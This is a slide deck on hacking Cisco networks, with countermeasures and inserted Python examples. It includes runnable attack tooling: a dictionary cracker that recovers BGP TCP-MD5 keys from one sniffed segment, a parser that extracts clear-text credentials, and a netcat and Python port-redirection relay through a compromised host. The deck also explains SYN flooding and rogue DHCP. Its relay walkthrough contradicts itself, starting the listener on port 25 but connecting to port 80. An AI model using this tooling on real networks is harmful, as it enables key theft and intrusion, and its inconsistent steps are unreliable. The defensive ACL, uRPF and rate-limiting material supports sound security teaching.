Hacking Cisco Networks and Countermeasures
Overview
• Reconnaissance Attacks
– Passive Sniffing
– Ping Sweeps
– Port Scans (TCP and UDP)
• Active Attacks
– Password attacks
– Trust exploitation
– Port redirection
• External Attacks
– IP Spoofing
– DoS, DDoS Attacks
• Internal Attacks
– DHCP and ARP Attacks
Reconnaissance Attacks
• Reconnaissance refers to the overall act of learning information about a target network by using readily available information and applications.
• Reconnaissance attacks include these attacks:
– Packet sniffers
– Port scans
– Ping sweeps
– Internet information queries
Packet Sniffers
• A packet sniffer is a software application that uses a network adapter card in promiscuous mode to capture all packets on its segment. Packet sniffer characteristics:
– Packet sniffers exploit information passed in clear text. Protocols that pass credentials and data in clear text include Telnet, FTP, SNMP (v1/v2c community strings), Post Office Protocol (POP) and HTTP.
– A packet sniffer must be able to see the traffic: on a hub it only needs to be in the same collision domain as the target; on a switch it needs a SPAN/mirror port or a man-in-the-middle position obtained with ARP poisoning (see the internal attacks later in this deck).
– Packet sniffers can be used legitimately or can be designed specifically for attack.
Passive Sniffing
(Diagram: a sniffer passively capturing Host A to Host B traffic as it crosses the segment between Router A and Router B.)
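As an added illustration for this page (not part of the original deck), here is what a sniffer's credential extractor does with the clear-text protocols named above: POP3 and FTP USER/PASS commands, HTTP Basic authentication (only base64), and a Telnet login where the client sends one keystroke per segment after option negotiation. The captured streams are constructed for the example, and the user names, passwords and the host 10.1.2.1 in them are made up.

```python
import base64
import re

# Constructed sample of application-layer payloads as a sniffer on the segment would
# capture them, one (direction, payload) pair per TCP segment. Every user name,
# password and address here is made up for the example.
SAMPLE_STREAMS = {
    "pop3": [
        ("server", b"+OK POP3 ready\r\n"),
        ("client", b"USER alice\r\n"),
        ("server", b"+OK\r\n"),
        ("client", b"PASS hunter2\r\n"),
    ],
    "ftp": [
        ("server", b"220 FTP server ready\r\n"),
        ("client", b"USER ftpuser\r\n"),
        ("server", b"331 Password required\r\n"),
        ("client", b"PASS s3cret\r\n"),
    ],
    "http": [
        ("client", b"GET /admin HTTP/1.1\r\nHost: 10.1.2.1\r\n"
                   b"Authorization: Basic YWRtaW46Y2lzY28xMjM=\r\n\r\n"),
    ],
    "telnet": [  # IAC DO sequences first, then the prompt; the client types one key per segment
        ("server", b"\xff\xfd\x18\xff\xfd\x20login: "),
        *[("client", c) for c in (b"r", b"o", b"o", b"t", b"\r\n")],
        ("server", b"Password: "),
        *[("client", c) for c in (b"c", b"i", b"s", b"c", b"o", b"\r\n")],
    ],
}

IAC = 0xFF


def strip_telnet_negotiation(data: bytes) -> bytes:
    """Drop Telnet option negotiation (IAC WILL/WONT/DO/DONT x, IAC SB ... SE), keep the text."""
    out, i = bytearray(), 0
    while i < len(data):
        if data[i] == IAC and i + 1 < len(data):
            cmd = data[i + 1]
            if cmd in (0xFB, 0xFC, 0xFD, 0xFE):        # three-byte option commands
                i += 3
            elif cmd == 0xFA:                            # subnegotiation up to IAC SE
                end = data.find(b"\xff\xf0", i)
                i = len(data) if end < 0 else end + 2
            else:                                        # two-byte command (or escaped 0xFF)
                i += 2
            continue
        out.append(data[i])
        i += 1
    return bytes(out)


def creds_from_user_pass(segments):
    """POP3 and FTP send USER and PASS as plain commands from the client."""
    user = password = None
    for direction, payload in segments:
        if direction != "client":
            continue
        for line in payload.decode("ascii", "replace").splitlines():
            m = re.match(r"(?i)^(USER|PASS)\s+(.+)$", line.strip())
            if m and m.group(1).upper() == "USER":
                user = m.group(2)
            elif m:
                password = m.group(2)
    return user, password


def creds_from_http_basic(segments):
    """HTTP Basic authentication is only base64 encoded, not encrypted."""
    for direction, payload in segments:
        m = re.search(rb"(?i)Authorization:\s*Basic\s+([A-Za-z0-9+/=]+)", payload)
        if direction == "client" and m:
            user, _, password = base64.b64decode(m.group(1)).decode().partition(":")
            return user, password
    return None, None


def creds_from_telnet(segments):
    """Telnet: the server prompts, the client echoes one keystroke per segment; pair them up."""
    fields, prompt, typed = {}, None, bytearray()
    for direction, payload in segments:
        data = strip_telnet_negotiation(payload)
        if direction == "server":
            text = data.decode("ascii", "replace").lower()
            prompt = "user" if "login" in text else "password" if "password" in text else prompt
        else:
            typed += data
            if typed.endswith(b"\n"):
                if prompt:
                    fields[prompt] = typed.decode("ascii", "replace").strip()
                typed = bytearray()
    return fields.get("user"), fields.get("password")


EXTRACTORS = {"pop3": creds_from_user_pass, "ftp": creds_from_user_pass,
              "http": creds_from_http_basic, "telnet": creds_from_telnet}


def extract_credentials(streams=SAMPLE_STREAMS):
    """Run the protocol-specific extractor over each captured stream."""
    return {proto: EXTRACTORS[proto](segs) for proto, segs in streams.items() if proto in EXTRACTORS}


if __name__ == "__main__":
    for proto, (user, password) in extract_credentials().items():
        print(f"{proto:6s} user={user!r} password={password!r}")
```

Nothing here decrypts anything: every credential is recovered by string matching, which is the whole point of the "clear text" bullet above and why the mitigation list that follows puts cryptography last but counts most.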
Packet Sniffer Attack Mitigation
• Here are some packet sniffer mitigation techniques and tools:
– Authentication
– Switched infrastructure
– Antisniffer tools
– Cryptography
Port Scans and Ping Sweeps
• Port scan and ping sweep attacks:
– Identify all services on the network
– Identify all hosts and devices on the network
– Identify the operating systems on the network
– Identify vulnerabilities on the network
Ping Sweep with NMAP
Ping Sweep (cont.)
Blocking Ping Sweeps
access-list 102 deny icmp any any echo
access-list 102 permit ip any any
!
interface FastEthernet0/0
 ip address 10.1.1.254 255.255.255.0
 ip access-group 102 in
It seems to work, but we give out too much information: for every echo request the ACL denies, the router itself answers the scanner with an ICMP destination unreachable (code 13, administratively prohibited), which confirms that a live filtering device sits in the path and which addresses it is protecting.
To block messages originating from the blocking router…
access-list 103 permit icmp any any unreachable
!
class-map match-all STOPSHARING
 match access-group 103
!
policy-map STOPSHARING
 class STOPSHARING
  drop
 class class-default
!
control-plane
 service-policy output STOPSHARING
Same result for the sweep, but this time we do not share the information: the control-plane egress policy drops the unreachables the router generates itself. An outbound interface ACL would not do this, because interface ACLs are not applied to packets the router originates; the simpler per-interface alternative is no ip unreachables.
Simple UDP Port Scan
A UDP scanner learns that a port is closed from the ICMP Destination Unreachable (type 3, code 3, port unreachable) the target sends back; a port that stays silent is reported as open|filtered.
How to block…
access-list 101 deny icmp any any unreachable
access-list 101 permit ip any any
!
interface FastEthernet0/0
 ip address 10.1.1.254 255.255.255.0
 ip access-group 101 out
We no longer forward any unreachable messages from the scanned hosts (here the unreachables are transit traffic, so the outbound ACL does filter them). After blocking, every UDP port looks open|filtered: some obscurity for the scanner, though the same ACL also hides legitimate unreachables such as fragmentation-needed messages from the hosts on that interface, which breaks path MTU discovery for them.
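The behaviour behind these screenshots, written out as an added example for this page (it is not the deck's own code): it builds the ICMP echo probe a ping sweep sends, the empty UDP probe of a simple port scanner, and the ICMP destination unreachable that the target host or the router answers with, then classifies the probed ports the way a scanner does under the three router configurations discussed above. The addresses 10.1.1.10, 10.1.2.20 and 10.1.1.254, the probed ports and which of them are closed are assumptions for the simulation.

```python
import ipaddress
import struct

ICMP_ECHO_REQUEST = 8
ICMP_DEST_UNREACH = 3
CODE_PORT_UNREACH = 3          # sent by the host: nothing listens on that UDP port
CODE_ADMIN_PROHIBITED = 13     # sent by a router whose ACL denied the packet


def internet_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement checksum shared by IP, ICMP, UDP and TCP."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_ipv4(src: str, dst: str, proto: int, payload: bytes) -> bytes:
    """Minimal 20-byte IPv4 header (no options) with a correct header checksum."""
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), 0, 0, 64, proto, 0,
                      ipaddress.IPv4Address(src).packed, ipaddress.IPv4Address(dst).packed)
    return hdr[:10] + struct.pack("!H", internet_checksum(hdr)) + hdr[12:] + payload


def build_icmp_echo(ident: int, seq: int, payload: bytes = b"ping-sweep") -> bytes:
    """ICMP echo request, the probe a ping sweep sends to every address in a range."""
    hdr = struct.pack("!BBHHH", ICMP_ECHO_REQUEST, 0, 0, ident, seq)
    csum = internet_checksum(hdr + payload)
    return hdr[:2] + struct.pack("!H", csum) + hdr[4:] + payload


def build_udp_probe(src: str, dst: str, sport: int, dport: int) -> bytes:
    """Empty UDP datagram as sent by a simple UDP port scanner (checksum 0 = none)."""
    return build_ipv4(src, dst, 17, struct.pack("!HHHH", sport, dport, 8, 0))


def build_unreachable(src: str, dst: str, code: int, original: bytes) -> bytes:
    """ICMP destination unreachable quoting the offending IP header plus 8 bytes (the UDP ports)."""
    body = struct.pack("!BBHI", ICMP_DEST_UNREACH, code, 0, 0) + original[:28]
    body = body[:2] + struct.pack("!H", internet_checksum(body)) + body[4:]
    return build_ipv4(src, dst, 1, body)


def parse_unreachable(packet: bytes):
    """Return (code, quoted destination port) for a valid ICMP unreachable, else None."""
    ihl = (packet[0] & 0x0F) * 4
    if packet[9] != 1:
        return None
    icmp = packet[ihl:]
    if icmp[0] != ICMP_DEST_UNREACH or internet_checksum(icmp) != 0:
        return None
    quoted = icmp[8:]
    q_ihl = (quoted[0] & 0x0F) * 4
    _, dport = struct.unpack("!HH", quoted[q_ihl:q_ihl + 4])
    return icmp[1], dport


def classify_udp_scan(probed_ports, responses) -> dict:
    """Scanner-side logic: silence is open|filtered, port-unreachable is closed,
    any other unreachable means something in the path filtered the probe."""
    state = {p: "open|filtered" for p in probed_ports}
    for pkt in responses:
        parsed = parse_unreachable(pkt)
        if parsed and parsed[1] in state:
            code, dport = parsed
            if code == CODE_PORT_UNREACH:
                state[dport] = "closed"
            elif code in (1, 2, 9, 10, 13):
                state[dport] = "filtered"
    return state


SCANNER, TARGET, ROUTER = "10.1.1.10", "10.1.2.20", "10.1.1.254"   # constructed lab addresses
PROBED = [53, 161, 162]
CLOSED_ON_TARGET = {53, 162}   # 161 is open, but snmpd ignores an empty probe, so it stays silent


def simulate_scan(router_mode: str) -> dict:
    """Scan TARGET from SCANNER through the router. router_mode is 'forward' (no filtering),
    'acl-deny' (the router's ACL denies the probes and answers with code 13, the
    'too much information' case) or 'drop-unreachables' (access-list 101 applied outbound)."""
    responses = []
    for port in PROBED:
        probe = build_udp_probe(SCANNER, TARGET, 40000, port)
        if router_mode == "acl-deny":
            responses.append(build_unreachable(ROUTER, SCANNER, CODE_ADMIN_PROHIBITED, probe))
        elif router_mode == "forward" and port in CLOSED_ON_TARGET:
            responses.append(build_unreachable(TARGET, SCANNER, CODE_PORT_UNREACH, probe))
    return classify_udp_scan(PROBED, responses)


if __name__ == "__main__":
    for mode in ("forward", "acl-deny", "drop-unreachables"):
        print(f"{mode:18s}", simulate_scan(mode))
```

The three results line up with the slides: unfiltered, the scanner sees 53 and 162 closed and 161 open|filtered; with the ACL denying probes it sees every port as filtered and learns the router's address from the code 13 replies; with unreachables dropped it sees nothing but open|filtered.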
Port Scan and Ping Sweep Attack Mitigation
• Port scans and ping sweeps cannot be prevented without compromising network capabilities.
• However, damage can be mitigated using IPS at the network and host levels.
(Diagram: workstation and laptop with HIPS; network IDS and IPS watching the shared connection that the scan crosses.)
Internet Information Queries
• Sample IP address query: attackers can use Internet tools such as whois as a weapon, because registry records reveal address blocks, name servers and contact names for a target organisation.
Access Attacks
• Intruders use access attacks on networks or systems for these reasons:
– Retrieve data
– Gain access
– Escalate their access privileges
• Access attacks include:
– Password attacks
– Trust exploitation
– Port redirection
Password Attacks
• Hackers implement password attacks using:
– Brute-force attacks
– Trojan horse programs
– IP spoofing
– Packet sniffers
Password Attack Example
– The bgp_md5crack tool is used for cracking the secret used for RFC 2385 based packet signing and authentication (the TCP MD5 signature option that BGP neighbors use). It is designed for offline cracking, meaning it works on a sniffed, correctly signed packet. This packet can either be sniffed directly off the wire or be provided in a pcap file.
– Because the signature is an MD5 of the visible packet plus the secret, one captured segment is enough to test candidate passwords at full speed without sending anything further to the router; the only protections are a long random key and, where supported, TCP-AO (RFC 5925).
For routing protocols… the same offline approach applies to the keyed-MD5 authentication of OSPF, RIPv2 and EIGRP, which also hash the packet together with the key.
Simple cracking with Cain…
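To show why one captured packet is enough, here is the RFC 2385 computation and the dictionary attack, written as an added example for this page; it is not bgp_md5crack's code. The BGP KEEPALIVE, the peer addresses 10.1.2.1 and 10.1.2.2, the ports and sequence numbers, the password and the word list are all constructed.

```python
import hashlib
import ipaddress
import struct

TCP_OPT_MD5 = 19   # TCP MD5 Signature Option kind (RFC 2385): kind, length 18, 16-byte digest


def tcp_md5_digest(src_ip: str, dst_ip: str, tcp_header: bytes, options: bytes,
                   payload: bytes, key: bytes) -> bytes:
    """RFC 2385 section 2: MD5 over the TCP pseudo-header, the 20-byte TCP header with
    options excluded and checksum zeroed, the segment data, and finally the key."""
    seg_len = len(tcp_header) + len(options) + len(payload)
    pseudo = (ipaddress.IPv4Address(src_ip).packed + ipaddress.IPv4Address(dst_ip).packed
              + struct.pack("!BBH", 0, 6, seg_len))
    header = tcp_header[:16] + b"\x00\x00" + tcp_header[18:20]
    return hashlib.md5(pseudo + header + payload + key).digest()


def build_signed_segment(src_ip, dst_ip, sport, dport, seq, ack, flags, payload, key):
    """TCP segment carrying the MD5 option, as a BGP speaker configured with
    'neighbor ... password' sends it. Checksum left zero: it is not covered by the digest."""
    options_len = 20                                    # 2 NOPs + 18-byte option
    data_offset = (20 + options_len) // 4
    header = struct.pack("!HHIIBBHHH", sport, dport, seq, ack, data_offset << 4, flags, 65535, 0, 0)
    digest = tcp_md5_digest(src_ip, dst_ip, header, b"\x00" * options_len, payload, key)
    options = b"\x01\x01" + bytes([TCP_OPT_MD5, 18]) + digest
    return header + options + payload


def split_segment(segment: bytes):
    """Return (header, options, payload, digest) from a raw TCP segment."""
    data_offset = (segment[12] >> 4) * 4
    header, options, payload = segment[:20], segment[20:data_offset], segment[data_offset:]
    digest, i = None, 0
    while i < len(options):
        kind = options[i]
        if kind == 0:                       # end of option list
            break
        if kind == 1:                       # NOP
            i += 1
            continue
        length = options[i + 1]
        if kind == TCP_OPT_MD5 and length == 18:
            digest = options[i + 2:i + 18]
        i += max(length, 2)
    return header, options, payload, digest


def crack_tcp_md5(src_ip: str, dst_ip: str, segment: bytes, candidates):
    """Offline dictionary attack on a single sniffed, correctly signed segment."""
    header, options, payload, digest = split_segment(segment)
    if digest is None:
        raise ValueError("segment carries no TCP MD5 signature option")
    for key in candidates:
        if tcp_md5_digest(src_ip, dst_ip, header, options, payload, key) == digest:
            return key
    return None


# Constructed capture: a BGP KEEPALIVE (16-byte marker, length 19, type 4) between two
# peers whose session password is 'cisco'. Addresses, ports and sequence numbers are made up.
PEER_A, PEER_B = "10.1.2.1", "10.1.2.2"
KEEPALIVE = b"\xff" * 16 + b"\x00\x13\x04"
CAPTURED = build_signed_segment(PEER_A, PEER_B, 179, 52003, 0x1A2B3C4D, 0x5E6F7A8B,
                                0x18, KEEPALIVE, b"cisco")
WORDLIST = [b"admin", b"bgp", b"password", b"cisco", b"s3cr3t!"]


def demo():
    return crack_tcp_md5(PEER_A, PEER_B, CAPTURED, WORDLIST)


if __name__ == "__main__":
    print("recovered key:", demo())
```

Every input to the digest except the key is on the wire, so the attacker's cost is one MD5 per candidate; a real tool only differs in reading the segment from a pcap and in how fast it iterates the word list.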
Trust Exploitation
– A hacker leverages existing trust relationships.
– Several trust models exist:
• Microsoft Windows: domains, Active Directory
• Linux and UNIX: NIS, NIS+
(Diagram: System A trusts System B, and System B trusts everyone. System B is compromised by a hacker, who presents as user psmith "Pat Smithson" to match the trusted account psmith "Pat Smith" and so gains access to System A.)
Trust relationships:
• System A trusts System B.
• System B trusts everyone.
• Therefore, in effect, System A trusts everyone.
Port Redirection
(Diagram: the att­acker connects to compromised Host A (source: attacker, destination: A, port 22). Host A relays the session to Host B on port 23, so Host B sees a connection from A (source: A, destination: B, port 23) although the real source is the attacker.)
Port Redirection Configuration
On HOSTA we create a named pipe using the mkfifo command:
#pipe will be the name of our named pipe
mkfifo pipe
We then create our two-way tunnel using Netcat on HOSTA (the -t option answers Telnet option negotiation, so the relayed session behaves like a real Telnet client):
nc -lvp 25 <pipe | nc -t 10.1.2.253 23 >pipe
Then telnet from the attacker machine to HOSTA, on the port the listener was started on:
telnet 10.1.2.1 80
Here we are connected to the internal switch through the compromised host…
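The same two-way relay written in Python, as an added example for this page (it is not the deck's netcat commands rewritten by their author): one listener on the compromised host and, for each accepted connection, a second leg to the internal service with bytes pumped in both directions. The internal Telnet service is stood in for by a constructed echo service on 127.0.0.1 so the demo runs offline; ports are chosen by the OS.

```python
import socket
import threading

BUFSIZE = 4096


def pump(src: socket.socket, dst: socket.socket) -> None:
    """Copy bytes one way until the source closes, then half-close the destination
    so the far end sees end-of-stream instead of a hang."""
    try:
        while True:
            chunk = src.recv(BUFSIZE)
            if not chunk:
                break
            dst.sendall(chunk)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def handle_client(client: socket.socket, target: tuple) -> None:
    """Second leg: connect to the real service and pump both directions, like the
    two netcat processes joined by the named pipe."""
    upstream = socket.create_connection(target, timeout=10)
    back = threading.Thread(target=pump, args=(upstream, client), daemon=True)
    back.start()
    pump(client, upstream)
    back.join()
    client.close()
    upstream.close()


def start_relay(listen_addr: tuple, target: tuple):
    """Listen on listen_addr and forward every accepted connection to target.
    Returns (bound port, listening socket); close the socket to stop the relay."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(listen_addr)
    srv.listen(5)

    def accept_loop():
        while True:
            try:
                client, _ = srv.accept()
            except OSError:
                return                      # listening socket closed
            client.settimeout(10)
            threading.Thread(target=handle_client, args=(client, target), daemon=True).start()

    threading.Thread(target=accept_loop, daemon=True).start()
    return srv.getsockname()[1], srv


def start_echo_service() -> int:
    """Stand-in for the internal Telnet service (constructed for the demo): answers one message."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)

    def serve():
        conn, _ = srv.accept()
        with conn:
            conn.sendall(b"internal> " + conn.recv(BUFSIZE))
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


def relay_roundtrip(message: bytes) -> bytes:
    """End to end: attacker -> relay on the 'compromised host' -> internal service, and back."""
    service_port = start_echo_service()
    relay_port, listener = start_relay(("127.0.0.1", 0), ("127.0.0.1", service_port))
    try:
        with socket.create_connection(("127.0.0.1", relay_port), timeout=10) as attacker:
            attacker.sendall(message)
            attacker.shutdown(socket.SHUT_WR)
            reply = b""
            while True:
                chunk = attacker.recv(BUFSIZE)
                if not chunk:
                    return reply
                reply += chunk
    finally:
        listener.close()


if __name__ == "__main__":
    print(relay_roundtrip(b"show running-config\r\n"))
```

From the internal service's point of view the connection comes from the relay host, which is exactly what makes port redirection work against source-address based trust and why the mitigation is host hardening plus egress filtering on the compromised segment, not a rule on the service alone.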
IP Spoofing
– IP spoofing occurs when a hacker inside or outside a network impersonates a trusted source by forging the source address of IP packets.
– IP spoofing uses trusted internal IP addresses or trusted external IP addresses.
– Attackers use IP spoofing for many reasons:
• To gain root access through address-based trust (host trust lists, ACLs keyed on source address)
• To inject malicious data or commands into an existing data stream
• To divert network packets to the hacker, who can then reply as a trusted user, by changing the routing tables
• To exhaust server resources (DoS), for example with SYN floods sent from forged sources
• As a step in a larger attack
IP Spoofing—Types of Attack
• IP spoofing attacks are either:
– Nonblind spoofing
• The attacker sniffs sequence numbers (e.g., from inside the subnet of the victim).
– Blind spoofing
• The attacker calculates sequence numbers.
• IP spoofing can lead to these types of attacks:
– Man-in-the-middle attack
– DoS attack
– Distributed DoS (DDoS) attack
Let’s see it in action
Here the router is made to reply to the other host: the echo request carries a forged source address, so the router’s echo reply goes to the spoofed host rather than back to the attacker.
Man-in-the-Middle Attacks
– A man-in-the-middle attack requires that the hacker has access to the network packets that cross a network.
– A man-in-the-middle attack is implemented using the following:
• Network packet sniffers (nonblind attack)
• Routing and transport protocols (blind attack)
(Diagram: Host A and Host B exchange data in clear text across Router A and Router B, with the attacker positioned in the path.)
IP Spoofing Attack Mitigation
• The threat of IP spoofing can be reduced, but not eliminated, using these measures:
– Strong access control at the router
• ACLs on the inbound (Internet-facing) interface: deny packets arriving from outside whose source is one of your internal address ranges or RFC 1918 space
• ACLs on the outbound interface: permit only your own address space as source, so your network cannot be used to launch spoofed traffic
– Data encryption
– Additional authentication requirements (anything stronger than trusting the source address)
(Diagram: Host A and Host B communicating through an IPsec tunnel between Router A and Router B across the ISP.)
DoS Attacks
• A DoS attack damages or corrupts your computer system or denies you and others access to your networks, systems, or services.
• DoS attack techniques very often use IP spoofing, both to hide the attacker and to make the flood harder to filter by source address.
TCP SYN Flooding DoS Attack
Normal TCP three-way handshake (a client port from the ephemeral range 1024–65535 to a well-known service port, here 80):
1. SYN: client → server
2. SYN and ACK: server → client
3. ACK: client → server
SYN flood: the attacker sends SYN packets to the victim's port 80 with spoofed source addresses. The victim answers each with a SYN and ACK sent to the spoofed address and waits for an ACK that never comes (step 3 is missing), so half-open connections accumulate in the listen backlog until it is full and legitimate clients are refused.
DDoS Attacks
• DoS and DDoS attacks have these characteristics:
– They are not generally targeted to gain access.
– They aim at making a service unavailable.
– They require very little effort to execute.
– They are difficult to eliminate.
(Diagram: in a DoS attack a single attacker floods the victim; in a DDoS attack the attacker drives an attack control mechanism that commands many zombies, which flood the victim together.)
DDoS Example
1. The cracker looks for targets.
2. The cracker installs software to scan, compromise and infect agents, turning them into zombies.
3. Agents are loaded with remote-control attack software.
4. The client issues commands to handlers, which control the agents in a mass attack.
(Diagram: client system → handler systems → agent systems → victim.)
SYN Flooding Attack
Let’s be more creative…
We put almost one million packets on the wire in a one-minute period; not so bad for a single host…
CPU consumption on the victim…
DoS and DDoS Attack Mitigation
• Reduce DoS and DDoS attacks by:
– Protecting yourself against IP spoofing with ingress- and
egress-filtering ACLs
– Using antivirus software to find zombie agents
– Using anti-DoS features on routers and firewalls
• ip verify unicast reverse-path interface command (unicast RPF: drop packets whose source address is not reachable back through the interface they arrived on)
• ACLs to filter all private Internet address space (RFC 1918) at the Internet edge, in both directions
– Using traffic rate limiting at the ISP level
• Use class-based traffic policing on ICMP packets
• Use SYN rate limiting
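Ingress/egress filtering and strict uRPF as decision logic, added here as an example for this page (not the deck's configuration and not IOS code). The routing table, interface names, address ranges and the six sample packets are constructed; the checks correspond to the RFC 1918 and anti-spoofing ACL on the ISP-facing interface, ip verify unicast reverse-path on every interface (with allow-default only where the default route is the legitimate return path), and an egress ACL that lets only our own prefixes out.

```python
import ipaddress

# Constructed edge-router state: routing table (prefix -> egress interface), the
# interface that faces the ISP, and the address space that belongs to us.
ROUTES = {
    ipaddress.ip_network("10.1.1.0/24"): "FastEthernet0/0",   # user LAN
    ipaddress.ip_network("10.1.2.0/24"): "FastEthernet0/1",   # server LAN
    ipaddress.ip_network("0.0.0.0/0"): "Serial0/0",            # default route toward the ISP
}
OUTSIDE_IF = "Serial0/0"
OUR_PREFIXES = [n for n, i in ROUTES.items() if i != OUTSIDE_IF]
# RFC 1918 plus the other source ranges that should never arrive from the Internet
BOGONS = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "127.0.0.0/8", "169.254.0.0/16",
    "172.16.0.0/12", "192.168.0.0/16", "224.0.0.0/3")]


def best_route(addr):
    """Longest-prefix match; returns (prefix, interface) or (None, None)."""
    ip = ipaddress.ip_address(addr)
    hits = [(net, iface) for net, iface in ROUTES.items() if ip in net]
    return max(hits, key=lambda h: h[0].prefixlen) if hits else (None, None)


def urpf_strict(src, ingress_if, allow_default=False) -> bool:
    """'ip verify unicast source reachable-via rx': the best route back to the source
    must leave through the interface the packet arrived on. The default route only
    counts when allow-default is configured."""
    prefix, iface = best_route(src)
    if prefix is None:
        return False
    if prefix.prefixlen == 0 and not allow_default:
        return False
    return iface == ingress_if


def ingress_acl(src, ingress_if) -> bool:
    """Anti-spoofing ACL on the ISP-facing interface: deny bogon sources and packets
    claiming to come from our own address space."""
    if ingress_if != OUTSIDE_IF:
        return True
    ip = ipaddress.ip_address(src)
    return not any(ip in net for net in BOGONS + OUR_PREFIXES)


def egress_acl(src, egress_if) -> bool:
    """Toward the ISP only our own prefixes may appear as source, so a compromised
    inside host cannot launch a spoofed flood through us."""
    if egress_if != OUTSIDE_IF:
        return True
    ip = ipaddress.ip_address(src)
    return any(ip in net for net in OUR_PREFIXES)


def forward(src, dst, ingress_if):
    """Apply the checks in the order a router would and return (verdict, reason)."""
    if not ingress_acl(src, ingress_if):
        return "drop", "ingress ACL: bogon or spoofed internal source"
    if not urpf_strict(src, ingress_if, allow_default=(ingress_if == OUTSIDE_IF)):
        return "drop", "uRPF: source not reachable via ingress interface"
    _, egress_if = best_route(dst)
    if egress_if is None:
        return "drop", "no route"
    if not egress_acl(src, egress_if):
        return "drop", "egress ACL: source is not ours"
    return "permit", f"{ingress_if} -> {egress_if}"


# Constructed test packets as (source, destination, ingress interface).
SAMPLE_PACKETS = [
    ("10.1.1.10", "198.51.100.5", "FastEthernet0/0"),    # normal user traffic to the Internet
    ("198.51.100.5", "10.1.2.5", "Serial0/0"),           # normal reply from the Internet
    ("10.1.2.5", "10.1.1.10", "Serial0/0"),              # outsider spoofing one of our servers
    ("192.168.77.1", "10.1.2.5", "Serial0/0"),           # RFC 1918 source from the Internet
    ("10.1.2.5", "198.51.100.5", "FastEthernet0/0"),     # LAN host spoofing a server address
    ("203.0.113.9", "198.51.100.5", "FastEthernet0/0"),  # LAN host spoofing an outside address
]


def run_samples():
    return [forward(*pkt)[0] for pkt in SAMPLE_PACKETS]


if __name__ == "__main__":
    for pkt in SAMPLE_PACKETS:
        print(pkt, "->", forward(*pkt))
```

The last two packets show why uRPF matters on the inside interfaces too: without it, a compromised LAN host can still spoof addresses that the Internet-edge ACL never sees.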
Rate Limiting
What rate limiting does:
• Allows network managers to set bandwidth thresholds per user class and per traffic type
Benefits:
• Prevents the deliberate or accidental flooding of the network
• Keeps traffic flowing smoothly; otherwise there can be a deliberate or accidental slowdown or freezing of the network
(Diagram: rate limiting for different classes of users (network manager, teachers, students) with thresholds of 2 Mbps, 10 Mbps and 50 Mbps.)
Example: ICMP rate limiting
access-list 170 permit icmp any any
!
interface FastEthernet0/0
 rate-limit input access-group 170 128000 16000 24000 conform-action transmit exceed-action drop
This is committed access rate (CAR): ICMP arriving on the interface is limited to 128000 bps with a normal burst of 16000 bytes and an extended burst of 24000 bytes; conforming packets are forwarded and excess packets dropped. On current IOS releases the MQC police command under a policy-map is the supported replacement for the legacy rate-limit command.
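What that rate-limit line does to a flood, as an added example for this page (not part of the original deck): a token-bucket model of CAR fed first with ordinary pings and then with a constructed flood at the rate of the earlier screenshots (about a million packets per minute). The packet sizes and the treatment of the extended burst as a hard limit (IOS drops borrowed packets probabilistically as the debt grows) are this example's simplifications.

```python
import re


class CarPolicer:
    """Token-bucket model of IOS committed access rate (CAR): rate in bits/s, normal
    burst and extended burst in bytes. Packets inside the normal burst conform; beyond
    it the flow may borrow up to the extended burst. IOS drops borrowed packets with a
    probability that grows with the debt; this model uses a hard limit instead."""

    def __init__(self, rate_bps: int, normal_burst: int, extended_burst: int):
        self.rate = rate_bps / 8.0            # token refill in bytes per second
        self.normal = normal_burst
        self.extended = extended_burst
        self.tokens = float(normal_burst)     # bucket starts full
        self.debt = 0.0                       # bytes borrowed beyond the normal burst
        self.last = 0.0

    def offer(self, size: int, now: float) -> str:
        elapsed = max(0.0, now - self.last)
        self.last = now
        refill = elapsed * self.rate
        repaid = min(self.debt, refill)       # new tokens first repay the debt
        self.debt -= repaid
        self.tokens = min(self.normal, self.tokens + refill - repaid)
        if self.tokens >= size:
            self.tokens -= size
            return "transmit"                 # conform-action transmit
        shortfall = size - self.tokens
        if self.debt + shortfall <= self.extended - self.normal:
            self.debt += shortfall
            self.tokens = 0.0
            return "transmit"                 # still inside the extended burst
        return "drop"                         # exceed-action drop


def policer_from_ios(line: str) -> CarPolicer:
    """Parse the numbers out of an IOS 'rate-limit ... <bps> <normal> <extended>' line."""
    m = re.search(r"rate-limit\s+(?:input|output)\s+access-group\s+\d+\s+(\d+)\s+(\d+)\s+(\d+)", line)
    if not m:
        raise ValueError("not a rate-limit line")
    return CarPolicer(*map(int, m.groups()))


def run(policer: CarPolicer, packets) -> dict:
    """Feed (timestamp, size) pairs through the policer and count the verdicts."""
    counts = {"transmit": 0, "drop": 0}
    for when, size in packets:
        counts[policer.offer(size, when)] += 1
    return counts


IOS_LINE = ("rate-limit input access-group 170 128000 16000 24000 "
            "conform-action transmit exceed-action drop")


def normal_ping(seconds=60):
    """One 84-byte echo request per second: ordinary troubleshooting traffic."""
    return [(float(t), 84) for t in range(seconds)]


def icmp_flood(seconds=6, pps=16667):
    """Constructed flood of 64-byte packets at roughly a million packets per minute."""
    return [(i / pps, 64) for i in range(seconds * pps)]


def demo() -> dict:
    return {"ping": run(policer_from_ios(IOS_LINE), normal_ping()),
            "flood": run(policer_from_ios(IOS_LINE), icmp_flood())}


if __name__ == "__main__":
    print(demo())
```

Six seconds of flood deliver about 100,000 packets and the policer passes roughly 1,875 of them (16000 + 8000 bytes of burst plus 16000 bytes per second of refill, at 64 bytes each), which is the behaviour a CPU graph on the router shows after the rate limit is applied; the 60 normal pings all conform.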
Spoofing the DHCP Server
1. An attacker activates a DHCP server on a network segment.
2. The client broadcasts a request for DHCP configuration information.
3. The rogue DHCP server responds before the legitimate DHCP server can respond, assigning attacker-defined IP configuration information.
4. Host packets are redirected to the attacker address as it emulates a default gateway for the erroneous DHCP address provided to the client.
